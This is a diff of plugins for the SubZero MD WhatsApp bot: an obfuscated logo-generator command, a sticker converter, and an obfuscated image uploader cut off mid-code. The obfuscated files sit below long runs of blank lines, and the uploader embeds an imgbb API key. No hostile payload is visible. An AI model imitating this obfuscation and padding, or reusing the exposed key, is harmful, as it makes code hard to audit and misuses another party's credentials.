fect-711.html&name=','https://api-pink-venom.vercel.app/api/logo?url=https://en.ephoto360.com/neon-devil-wings-text-effect-online-683.html&name=','https://api-pink-venom.vercel.app/api/logo?url=https://en.ephoto360.com/create-digital-glitch-text-effects-online-767.html&name=','3029980xLBPww','../lib/functions','>\x20©\x20Gᴇɴᴇʀᴀᴛᴇᴅ\x20Bʏ\x20SᴜʙZᴇʀᴏ\x20⚡','download_url','messages','../command','https://api-pink-venom.vercel.app/api/logo?url=https://en.ephoto360.com/create-colorful-neon-light-text-effects-online-797.html&name=','https://api-pink-venom.vercel.app/api/logo?url=https://en.ephoto360.com/beautiful-3d-foil-balloon-effects-for-holidays-and-birthday-803.html&name='];_0xd94a=function(){return _0x405964;};return _0xd94a();}function hi(){const _0x50fc16=_0x12a3;console[_0x50fc16(0x216)](_0x50fc16(0x214));}hi();const {cmd,commands}=require(_0xbfdeb2(0x20f)),{fetchJson}=require(_0xbfdeb2(0x20b));cmd({'pattern':_0xbfdeb2(0x1f9),'desc':_0xbfdeb2(0x201),'react':'🎁','category':'other','filename':__filename},async(_0x59727c,_0xe0acbe,_0x4b737f,{from:_0x1be204,quoted:_0x431024,body:_0x3723c9,isCmd:_0x47d868,command:_0x542867,args:_0x54ad11,q:_0x1a845,isGroup:_0x4df87f,sender:_0x84127,senderNumber:_0xa51f44,botNumber2:_0x2a0570,botNumber:_0x56ff20,pushname:_0x20815a,isMe:_0x3463d6,isOwner:_0x20717b,groupMetadata:_0x1b892f,groupName:_0x30641b,participants:_0x1e2bdf,groupAdmins:_0x2fe9c3,isBotAdmins:_0x5bed96,isAdmins:_0x39f419,reply:_0x31537e})=>{const _0x1751a0=_0xbfdeb2;try{if(!_0x54ad11[0x0])return _0x31537e(_0x1751a0(0x1fd));let _0x54db66=_0x1751a0(0x1f5)+_0x1a845+_0x1751a0(0x212);const _0x294ace={'newsletterJid':_0x1751a0(0x1f4),'newsletterName':_0x1751a0(0x1fe),'serverMessageId':0x3e7},_0x2c0fce={'mentionedJid':[_0x4b737f['sender']],'forwardingScore':0x3e7,'isForwarded':!![],'forwardedNewsletterMessageInfo':_0x294ace},_0x4e723f={'text':_0x54db66,'contextInfo':_0x2c0fce};let _0x2d6d27=await _0x59727c['sendMessage'](_0x1be204,_0x4e723f,{'quoted':_0xe0acbe});_0x59727c['ev']['on'](_0x1751a0(0x204),async _0xf26b51=>{const _0x454c36=_0x1751a0,_0x3ab765=_0xf26b51[_0x454c36(0x20e)][0x0];if(!_0x3ab765[_0x454c36(0x1fa)]||!_0x3ab765[_0x454c36(0x1fa)][_0x454c36(0x1f7)])return;const _0x8754f0=_0x3ab765[_0x454c36(0x1fa)]['extendedTextMessage']['text']['trim']();if(_0x3ab765[_0x454c36(0x1fa)]['extendedTextMessage'][_0x454c36(0x219)]&&_0x3ab765['message'][_0x454c36(0x1f7)][_0x454c36(0x219)]['stanzaId']===_0x2d6d27['key']['id'])switch(_0x8754f0){case'1':let _0x5e8f17=await fetchJson(_0x454c36(0x21a)+_0x1a845);await _0x59727c[_0x454c36(0x21c)](_0x1be204,{'image':{'url':''+_0x5e8f17[_0x454c36(0x1fc)][_0x454c36(0x20d)]},'caption':_0x454c36(0x20c)},{'quoted':_0xe0acbe});break;case'2':let _0x362960=await fetchJson(_0x454c36(0x207)+_0x1a845);await _0x59727c[_0x454c36(0x21c)](_0x1be204,{'image':{'url':''+_0x362960[_0x454c36(0x1fc)]['download_url']},'caption':_0x454c36(0x20c)},{'quoted':_0xe0acbe});break;case'3':let _0x2bf66b=await fetchJson('https://api-pink-venom.vercel.app/api/logo?url=https://en.ephoto360.com/create-glossy-silver-3d-text-effect-online-802.html&name='+_0x1a845);await _0x59727c[_0x454c36(0x21c)](_0x1be204,{'image':{'url':''+_0x2bf66b[_0x454c36(0x1fc)][_0x454c36(0x20d)]},'caption':_0x454c36(0x20c)},{'quoted':_0xe0acbe});break;case'4':let _0x3e1a65=await fetchJson('https://api-pink-venom.vercel.app/api/logo?url=https://en.ephoto360.com/naruto-shippuden-logo-style-text-effect-online-808.html&name='+_0x1a845);await _0x59727c[_0x454c36(0x21c)](_0x1be204,{'image':{'url':''+_0x3e1a65[_0x454c36(0x1fc)][_0x454c36(0x20d)]},'caption':'>\x20©\x20Gᴇɴᴇʀᴀᴛᴇᴅ\x20Bʏ\x20SᴜʙZᴇʀᴏ\x20⚡'},{'quoted':_0xe0acbe});break;case'5':let _0x4fe078=await fetchJson(_0x454c36(0x209)+_0x1a845);await _0x59727c[_0x454c36(0x21c)](_0x1be204,{'image':{'url':''+_0x4fe078[_0x454c36(0x1fc)][_0x454c36(0x20d)]},'caption':_0x454c36(0x20c)},{'quoted':_0xe0acbe});break;case'6':let _0x58fea6=await fetchJson(_0x454c36(0x215)+_0x1a845);await _0x59727c[_0x454c36(0x21c)](_0x1be204,{'image':{'url':''+_0x58fea6['result'][_0x454c36(0x20d)]},'caption':'>\x20©\x20Gᴇɴᴇʀᴀᴛᴇᴅ\x20Bʏ\x20SᴜʙZᴇʀᴏ\x20⚡'},{'quoted':_0xe0acbe});break;case'7':let _0x334ff1=await fetchJson(_0x454c36(0x217)+_0x1a845);await _0x59727c['sendMessage'](_0x1be204,{'image':{'url':''+_0x334ff1['result']['download_url']},'caption':_0x454c36(0x20c)},{'quoted':_0xe0acbe});break;case'8':let _0x42d789=await fetchJson(_0x454c36(0x210)+_0x1a845);await _0x59727c['sendMessage'](_0x1be204,{'image':{'url':''+_0x42d789[_0x454c36(0x1fc)][_0x454c36(0x20d)]},'caption':'>\x20©\x20Gᴇɴᴇʀᴀᴛᴇᴅ\x20Bʏ\x20SᴜʙZᴇʀᴏ\x20⚡'},{'quoted':_0xe0acbe});break;case'9':let _0x1ab098=await fetchJson(_0x454c36(0x1f3)+_0x1a845);await _0x59727c['sendMessage'](_0x1be204,{'image':{'url':''+_0x1ab098[_0x454c36(0x1fc)][_0x454c36(0x20d)]},'caption':_0x454c36(0x20c)},{'quoted':_0xe0acbe});break;case'10':let _0x435db2=await fetchJson(_0x454c36(0x208)+_0x1a845);await _0x59727c[_0x454c36(0x21c)](_0x1be204,{'image':{'url':''+_0x435db2[_0x454c36(0x1fc)][_0x454c36(0x20d)]},'caption':'>\x20©\x20Gᴇɴᴇʀᴀᴛᴇᴅ\x20Bʏ\x20SᴜʙZᴇʀᴏ\x20⚡'},{'quoted':_0xe0acbe});break;case'11':let _0x5e3334=await fetchJson('https://api-pink-venom.vercel.app/api/logo?url=https://en.ephoto360.com/write-text-on-wet-glass-online-589.html&name='+_0x1a845);await _0x59727c[_0x454c36(0x21c)](_0x1be204,{'image':{'url':''+_0x5e3334['result'][_0x454c36(0x20d)]},'caption':'>\x20©\x20Gᴇɴᴇʀᴀᴛᴇᴅ\x20Bʏ\x20SᴜʙZᴇʀᴏ\x20⚡'},{'quoted':_0xe0acbe});break;case'12':let _0x42d786=await fetchJson(_0x454c36(0x203)+_0x1a845);await _0x59727c['sendMessage'](_0x1be204,{'image':{'url':''+_0x42d786[_0x454c36(0x1fc)][_0x454c36(0x20d)]},'caption':'>\x20©\x20Gᴇɴᴇʀᴀᴛᴇᴅ\x20Bʏ\x20SᴜʙZᴇʀᴏ\x20⚡'},{'quoted':_0xe0acbe});break;case'13':let _0x19719e=await fetchJson(_0x454c36(0x21d)+_0x1a845);await _0x59727c['sendMessage'](_0x1be204,{'image':{'url':''+_0x19719e[_0x454c36(0x1fc)]['download_url']},'caption':'>\x20©\x20Gᴇɴᴇʀᴀᴛᴇᴅ\x20Bʏ\x20SᴜʙZᴇʀᴏ\x20⚡'},{'quoted':_0xe0acbe});break;case'14':let _0x135ada=await fetchJson('https://api-pink-venom.vercel.app/api/logo?url=https://en.ephoto360.com/handwritten-text-on-foggy-glass-online-680.html&name='+_0x1a845);await _0x59727c[_0x454c36(0x21c)](_0x1be204,{'image':{'url':''+_0x135ada[_0x454c36(0x1fc)][_0x454c36(0x20d)]},'caption':_0x454c36(0x20c)},{'quoted':_0xe0acbe});break;case'15':let _0x181561=await fetchJson(_0x454c36(0x210)+_0x1a845);await _0x59727c[_0x454c36(0x21c)](_0x1be204,{'image':{'url':''+_0x181561[_0x454c36(0x1fc)][_0x454c36(0x20d)]},'caption':_0x454c36(0x20c)},{'quoted':_0xe0acbe});break;case'16':let _0x58ef98=await fetchJson(_0x454c36(0x213)+_0x1a845);await _0x59727c['sendMessage'](_0x1be204,{'image':{'url':''+_0x58ef98[_0x454c36(0x1fc)]['download_url']},'caption':_0x454c36(0x20c)},{'quoted':_0xe0acbe});break;case'17':let _0x52211b=await fetchJson(_0x454c36(0x1f1)+_0x1a845);await _0x59727c[_0x454c36(0x21c)](_0x1be204,{'image':{'url':''+_0x52211b[_0x454c36(0x1fc)][_0x454c36(0x20d)]},'caption':_0x454c36(0x20c)},{'quoted':_0xe0acbe});break;case'18':let _0x21e2d7=await fetchJson(_0x454c36(0x211)+_0x1a845);await _0x59727c['sendMessage'](_0x1be204,{'image':{'url':''+_0x21e2d7[_0x454c36(0x1fc)][_0x454c36(0x20d)]},'caption':_0x454c36(0x20c)},{'quoted':_0xe0acbe});break;case'19':let _0x4e4bbb=await fetchJson(_0x454c36(0x1f8)+_0x1a845);await _0x59727c[_0x454c36(0x21c)](_0x1be204,{'image':{'url':''+_0x4e4bbb[_0x454c36(0x1fc)]['download_url']},'caption':_0x454c36(0x20c)},{'quoted':_0xe0acbe});break;case'20':let _0x30a120=await fetchJson(_0x454c36(0x200)+_0x1a845);await _0x59727c[_0x454c36(0x21c)](_0x1be204,{'image':{'url':''+_0x30a120[_0x454c36(0x1fc)][_0x454c36(0x20d)]},'caption':_0x454c36(0x20c)},{'quoted':_0xe0acbe});break;default:_0x31537e(_0x454c36(0x218));}});}catch(_0x16f7e1){console[_0x1751a0(0x216)](_0x16f7e1),_0x31537e(''+_0x16f7e1);}});
|
plugins/convert-sticker.js
ADDED
@@ -0,0 +1,286 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
|
218 |
+
const config = require('../config');
|
219 |
+
const { Sticker, StickerTypes } = require('wa-sticker-formatter');
|
220 |
+
const { cmd } = require('../command');
|
221 |
+
const { getRandom } = require('../lib/functions');
|
222 |
+
|
223 |
+
var imgmsg = '';
|
224 |
+
if (config.LANG === 'SI') imgmsg = 'ඡායාරූපයකට mention දෙන්න!';
|
225 |
+
else imgmsg = 'ʀᴇᴘʟʏ ᴛᴏ ᴀ ᴘʜᴏᴛᴏ ғᴏʀ sᴛɪᴄᴋᴇʀ!';
|
226 |
+
|
227 |
+
var descg = '';
|
228 |
+
if (config.LANG === 'SI') descg = 'එය ඔබගේ mention දුන් ඡායාරූපය ස්ටිකර් බවට පරිවර්තනය කරයි.';
|
229 |
+
else descg = 'ɪᴛ ᴄᴏɴᴠᴇʀᴛs ʏᴏᴜʀ ʀᴇᴘʟɪᴇᴅ ᴘʜᴏᴛᴏ ᴛᴏ sᴛɪᴄᴋᴇʀ.';
|
230 |
+
|
231 |
+
cmd({
|
232 |
+
pattern: 'sticker',
|
233 |
+
react: '🪄',
|
234 |
+
alias: ['s', 'stic'],
|
235 |
+
desc: descg,
|
236 |
+
category: 'convert',
|
237 |
+
use: '.sticker <Reply to image>',
|
238 |
+
filename: __filename
|
239 |
+
}, async (conn, mek, m, { from, reply, isCmd, command, args, q, isGroup, pushname }) => {
|
240 |
+
try {
|
241 |
+
const isQuotedImage = m.quoted && (m.quoted.type === 'imageMessage' || (m.quoted.type === 'viewOnceMessage' && m.quoted.msg.type === 'imageMessage'));
|
242 |
+
const isQuotedSticker = m.quoted && m.quoted.type === 'stickerMessage';
|
243 |
+
|
244 |
+
if ((m.type === 'imageMessage') || isQuotedImage) {
|
245 |
+
const nameJpg = getRandom('.jpg');
|
246 |
+
const imageBuffer = isQuotedImage ? await m.quoted.download() : await m.download();
|
247 |
+
await require('fs').promises.writeFile(nameJpg, imageBuffer);
|
248 |
+
|
249 |
+
let sticker = new Sticker(nameJpg, {
|
250 |
+
pack: pushname, // The pack name
|
251 |
+
author: '', // The author name
|
252 |
+
type: q.includes('--crop') || q.includes('-c') ? StickerTypes.CROPPED : StickerTypes.FULL,
|
253 |
+
categories: ['🤩', '🎉'], // The sticker category
|
254 |
+
id: '12345', // The sticker id
|
255 |
+
quality: 75, // The quality of the output file
|
256 |
+
background: 'transparent', // The sticker background color (only for full stickers)
|
257 |
+
});
|
258 |
+
|
259 |
+
const buffer = await sticker.toBuffer();
|
260 |
+
return conn.sendMessage(from, { sticker: buffer }, { quoted: mek });
|
261 |
+
} else if (isQuotedSticker) {
|
262 |
+
const nameWebp = getRandom('.webp');
|
263 |
+
const stickerBuffer = await m.quoted.download();
|
264 |
+
await require('fs').promises.writeFile(nameWebp, stickerBuffer);
|
265 |
+
|
266 |
+
let sticker = new Sticker(nameWebp, {
|
267 |
+
pack: '❄️SUBZERO - MD❄️', // The pack name
|
268 |
+
author: '『 Mʀ Fʀᴀɴᴋ Oғᴄ』', // The author name
|
269 |
+
type: q.includes('--crop') || q.includes('-c') ? StickerTypes.CROPPED : StickerTypes.FULL,
|
270 |
+
categories: ['🤩', '🎉'], // The sticker category
|
271 |
+
id: '12345', // The sticker id
|
272 |
+
quality: 75, // The quality of the output file
|
273 |
+
background: 'transparent', // The sticker background color (only for full stickers)
|
274 |
+
});
|
275 |
+
|
276 |
+
const buffer = await sticker.toBuffer();
|
277 |
+
return conn.sendMessage(from, { sticker: buffer }, { quoted: mek });
|
278 |
+
} else {
|
279 |
+
return await reply(imgmsg);
|
280 |
+
}
|
281 |
+
} catch (e) {
|
282 |
+
reply('Error !!');
|
283 |
+
console.error(e);
|
284 |
+
}
|
285 |
+
});
|
286 |
+
|
plugins/convert-tourl.js
ADDED
@@ -0,0 +1,220 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
|
218 |
+
|
219 |
+
|
220 |
+
const _0xab4259=_0x1280;(function(_0x56163f,_0x24b585){const _0x3300c5=_0x1280,_0x37d4fe=_0x56163f();while(!![]){try{const _0x1f8545=-parseInt(_0x3300c5(0x180))/0x1+parseInt(_0x3300c5(0x189))/0x2*(-parseInt(_0x3300c5(0x186))/0x3)+parseInt(_0x3300c5(0x18e))/0x4+-parseInt(_0x3300c5(0x18b))/0x5+parseInt(_0x3300c5(0x190))/0x6+-parseInt(_0x3300c5(0x18f))/0x7*(parseInt(_0x3300c5(0x18d))/0x8)+parseInt(_0x3300c5(0x1a0))/0x9*(parseInt(_0x3300c5(0x19a))/0xa);if(_0x1f8545===_0x24b585)break;else _0x37d4fe['push'](_0x37d4fe['shift']());}catch(_0x49789a){_0x37d4fe['push'](_0x37d4fe['shift']());}}}(_0x3646,0xa4cfe));function hi(){const _0x1ffaad=_0x1280;console[_0x1ffaad(0x181)]('Hello\x20World!');}function _0x1280(_0x3a9145,_0xc0e448){const _0x364692=_0x3646();return _0x1280=function(_0x128010,_0x144d72){_0x128010=_0x128010-0x17e;let _0xf85226=_0x364692[_0x128010];return _0xf85226;},_0x1280(_0x3a9145,_0xc0e448);}function _0x3646(){const _0x4b9b56=['723087IDlMYQ','https://api.imgbb.com/1/upload?key=06d00f0e4520243a32b58138765a2ecc','*SUBZERO-MD\x20IMG\x20URL\x20📸*\x0a\x20','../command','append','img2url','142438Ptwwky','log','path','\x0a\x0a>\x20*©\x20ᴜᴘʟᴏᴀᴅᴇᴅ\x20ʙʏ\x20sᴜʙᴢᴇʀᴏ\x20ᴍᴅ\x20❄️*','join','data','324366wUnIhL','imgtourl','.maid','22uTrJwG','mrfrankofc','4452265AhCien','unlinkSync','8Ivkwji','207188fLfLDF','878297DJfGkP','3846180VybwUJ','\x20Byte(s)\x0a\x20*URL-IMG*\x20🖇️\x20','image','tmpdir','url','_`🌻\x20Reply\x20To\x20image`_','❌\x20Error\x20al\x20subir\x20el\x20archivo','createReadStream','reply','quoted','290yWFHxC','anime','writeFileSync','msg','convert.','axios'];_0x3646=function(){return _0x4b9b56;};return _0x3646();}hi();const axios=require(_0xab4259(0x19f)),FormData=require('form-data'),fs=require('fs'),os=require('os'),path=require(_0xab4259(0x182)),{cmd,commands}=require(_0xab4259(0x1a3));cmd({'pattern':'tourl','alias':[_0xab4259(0x187),_0xab4259(0x17f),_0xab4259(0x194)],'react':'🖇','desc':_0xab4259(0x19e),'category':_0xab4259(0x19b),'use':_0xab4259(0x188),'filename':__filename},async(_0x2febcf,_0x29e62d,_0x70b4bd,{from:_0x1e3d52,mnu:_0x4ba4d6,quoted:_0x1ea9f7,body:_0x20aa52,isCmd:_0xe6373e,command:_0x55bee6,args:_0x532db7,q:_0x30b23b,isGroup:_0x5e4169,sender:_0x133c24,senderNumber:_0x223ac2,botNumber2:_0x41117e,botNumber:_0x1c8d68,pushname:_0x116483,isMe:_0x3b1d41,isOwner:_0x4eb05f,groupMetadata:_0x265936,groupName:_0x20faf9,participants:_0x23cb3e,groupAdmins:_0x2a6cf5,isBotAdmins:_0x38c947,isAdmins:_0x1c6d2f,reply:_0x4cd1a1})=>{const _0x3d849a=_0xab4259;try{let 